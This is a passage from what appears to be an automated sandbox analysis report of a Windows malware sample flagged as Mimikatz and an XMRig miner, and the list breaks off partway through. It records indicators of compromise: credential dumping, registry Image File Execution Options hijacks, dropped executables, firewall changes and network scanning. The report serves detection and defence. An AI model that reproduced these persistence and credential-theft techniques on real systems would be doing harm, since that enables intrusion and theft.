Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-11-2024 09:21
Behavioral task
behavioral1
Sample
2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe
-
Size
9.4MB
-
MD5
7a5a1aad939d69699361d231cdc45e6a
-
SHA1
c48493ab4b31dd6462c1a09051e9e08b3e713865
-
SHA256
63979f47203de4e42b1bba8235a393b993c5c241d146ae8b20143976af6dba55
-
SHA512
285a81780688bd232fe0c285757e6d8d7f0ee8269d30a229a42f2203265fb2588720c8bd986b7eb4fbf348084a7528355fe39a07122d8175eceaae76900f381c
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
yittybr.exedescription pid Process procid_target PID 1848 created 2084 1848 yittybr.exe 37 -
Xmrig family
-
Contacts a large (18796) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
Processes:
resource yara_rule behavioral2/memory/2988-177-0x00007FF72A670000-0x00007FF72A790000-memory.dmp xmrig behavioral2/memory/2988-182-0x00007FF72A670000-0x00007FF72A790000-memory.dmp xmrig behavioral2/memory/2988-199-0x00007FF72A670000-0x00007FF72A790000-memory.dmp xmrig behavioral2/memory/2988-209-0x00007FF72A670000-0x00007FF72A790000-memory.dmp xmrig behavioral2/memory/2988-217-0x00007FF72A670000-0x00007FF72A790000-memory.dmp xmrig behavioral2/memory/2988-230-0x00007FF72A670000-0x00007FF72A790000-memory.dmp xmrig behavioral2/memory/2988-247-0x00007FF72A670000-0x00007FF72A790000-memory.dmp xmrig behavioral2/memory/2988-488-0x00007FF72A670000-0x00007FF72A790000-memory.dmp xmrig behavioral2/memory/2988-489-0x00007FF72A670000-0x00007FF72A790000-memory.dmp xmrig behavioral2/memory/2988-492-0x00007FF72A670000-0x00007FF72A790000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/2536-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2536-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023c9d-6.dat mimikatz behavioral2/memory/1316-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1236-137-0x00007FF770B00000-0x00007FF770BEE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
yittybr.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts yittybr.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts yittybr.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
yittybr.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe yittybr.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 4500 netsh.exe 3584 netsh.exe -
Executes dropped EXE 27 IoCs
Processes:
yittybr.exeyittybr.exewpcap.exebjfisnrbq.exevfshost.exebtjlhtrlh.exexohudmc.exemesuau.exettlnnh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exeyittybr.exevmlbqggye.exepid Process 1316 yittybr.exe 1848 yittybr.exe 3864 wpcap.exe 4564 bjfisnrbq.exe 1236 vfshost.exe 2936 btjlhtrlh.exe 4792 xohudmc.exe 64 mesuau.exe 2988 ttlnnh.exe 2616 btjlhtrlh.exe 1316 btjlhtrlh.exe 448 btjlhtrlh.exe 4020 btjlhtrlh.exe 4912 btjlhtrlh.exe 1956 btjlhtrlh.exe 1100 btjlhtrlh.exe 4304 btjlhtrlh.exe 3692 btjlhtrlh.exe 2592 btjlhtrlh.exe 404 btjlhtrlh.exe 2372 btjlhtrlh.exe 2064 btjlhtrlh.exe 852 btjlhtrlh.exe 3052 btjlhtrlh.exe 1516 btjlhtrlh.exe 644 yittybr.exe 2384 vmlbqggye.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exebjfisnrbq.exepid Process 3864 wpcap.exe 3864 wpcap.exe 3864 wpcap.exe 3864 wpcap.exe 3864 wpcap.exe 3864 wpcap.exe 3864 wpcap.exe 3864 wpcap.exe 3864 wpcap.exe 4564 bjfisnrbq.exe 4564 bjfisnrbq.exe 4564 bjfisnrbq.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 72 ifconfig.me 73 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
wpcap.exexohudmc.exeyittybr.exedescription ioc Process File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\mesuau.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content yittybr.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF yittybr.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 yittybr.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\mesuau.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies yittybr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 yittybr.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023cf2-134.dat upx behavioral2/memory/1236-135-0x00007FF770B00000-0x00007FF770BEE000-memory.dmp upx behavioral2/memory/1236-137-0x00007FF770B00000-0x00007FF770BEE000-memory.dmp upx behavioral2/files/0x0007000000023cfd-140.dat upx behavioral2/memory/2936-141-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/2936-145-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/files/0x0007000000023cfa-162.dat upx behavioral2/memory/2988-163-0x00007FF72A670000-0x00007FF72A790000-memory.dmp upx behavioral2/memory/2616-171-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/1316-175-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/2988-177-0x00007FF72A670000-0x00007FF72A790000-memory.dmp upx behavioral2/memory/448-180-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/2988-182-0x00007FF72A670000-0x00007FF72A790000-memory.dmp upx behavioral2/memory/4020-185-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/4912-189-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/1956-193-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/1100-197-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/2988-199-0x00007FF72A670000-0x00007FF72A790000-memory.dmp upx behavioral2/memory/4304-202-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/3692-206-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/2988-209-0x00007FF72A670000-0x00007FF72A790000-memory.dmp upx behavioral2/memory/2592-211-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/404-215-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/2988-217-0x00007FF72A670000-0x00007FF72A790000-memory.dmp upx behavioral2/memory/2372-220-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/2064-224-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/852-228-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/2988-230-0x00007FF72A670000-0x00007FF72A790000-memory.dmp upx behavioral2/memory/3052-232-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/1516-234-0x00007FF7523F0000-0x00007FF75244B000-memory.dmp upx behavioral2/memory/2988-247-0x00007FF72A670000-0x00007FF72A790000-memory.dmp upx behavioral2/memory/2988-488-0x00007FF72A670000-0x00007FF72A790000-memory.dmp upx behavioral2/memory/2988-489-0x00007FF72A670000-0x00007FF72A790000-memory.dmp upx behavioral2/memory/2988-492-0x00007FF72A670000-0x00007FF72A790000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exeyittybr.exevmlbqggye.execmd.exedescription ioc Process File opened for modification C:\Windows\tllefmnq\yittybr.exe 2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\ssleay32.dll yittybr.exe File created C:\Windows\ppgkyibiq\upbdrjv\swrpwe.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\docmicfg.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\tucl-1.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\Shellcode.ini yittybr.exe File opened for modification C:\Windows\ppgkyibiq\ihnqsqiep\Result.txt vmlbqggye.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\libeay32.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\posh-0.dll yittybr.exe File opened for modification C:\Windows\tllefmnq\spoolsrv.xml yittybr.exe File opened for modification C:\Windows\tllefmnq\docmicfg.xml yittybr.exe File created C:\Windows\ppgkyibiq\Corporate\mimidrv.sys yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe yittybr.exe File created C:\Windows\ppgkyibiq\Corporate\vfshost.exe yittybr.exe File opened for modification C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\spoolsrv.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\AppCapture64.dll yittybr.exe File opened for modification C:\Windows\ppgkyibiq\Corporate\log.txt cmd.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\scan.bat yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\Packet.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\trfo-2.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\docmicfg.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\zlib1.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\schoedcl.exe yittybr.exe File created C:\Windows\tllefmnq\svschost.xml yittybr.exe File created C:\Windows\tllefmnq\spoolsrv.xml yittybr.exe File created C:\Windows\tllefmnq\vimpcsvc.xml yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\vmlbqggye.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\svschost.xml yittybr.exe File created C:\Windows\tllefmnq\docmicfg.xml yittybr.exe File created C:\Windows\ppgkyibiq\Corporate\mimilib.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\crli-0.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\svschost.xml yittybr.exe File created C:\Windows\ime\yittybr.exe yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\spoolsrv.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\docmicfg.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\schoedcl.xml yittybr.exe File created C:\Windows\tllefmnq\yittybr.exe 2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\tibe-2.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\svschost.exe yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\libxml2.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\ucl.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\vimpcsvc.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\schoedcl.xml yittybr.exe File opened for modification C:\Windows\tllefmnq\vimpcsvc.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\trch-1.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\vimpcsvc.xml yittybr.exe File created C:\Windows\tllefmnq\schoedcl.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\exma-1.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\vimpcsvc.exe yittybr.exe File opened for modification C:\Windows\tllefmnq\svschost.xml yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\AppCapture32.dll yittybr.exe File created C:\Windows\ppgkyibiq\ihnqsqiep\ip.txt yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\cnli-1.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\coli-0.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\specials\xdvl-0.dll yittybr.exe File created C:\Windows\ppgkyibiq\UnattendGC\spoolsrv.xml yittybr.exe File opened for modification C:\Windows\tllefmnq\schoedcl.xml yittybr.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 5008 sc.exe 1080 sc.exe 2592 sc.exe 4428 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
netsh.execmd.exenet1.exe2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.execmd.execmd.exenet1.execmd.exenet1.execacls.execmd.exenetsh.execmd.exexohudmc.execmd.execmd.exenetsh.exenet.exenet.exeschtasks.exenetsh.exesc.execmd.execmd.execmd.execmd.exenet.execmd.execmd.execmd.execmd.exesc.exenet1.exemesuau.execmd.execmd.execmd.exenet.exesc.execmd.exeyittybr.exeyittybr.exenetsh.exenet1.execmd.exenet1.exenet1.exenet1.exenetsh.exenetsh.exenet.exewpcap.exenetsh.execacls.exeschtasks.exenetsh.execacls.exePING.EXEnetsh.exeschtasks.execmd.execmd.execmd.execacls.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 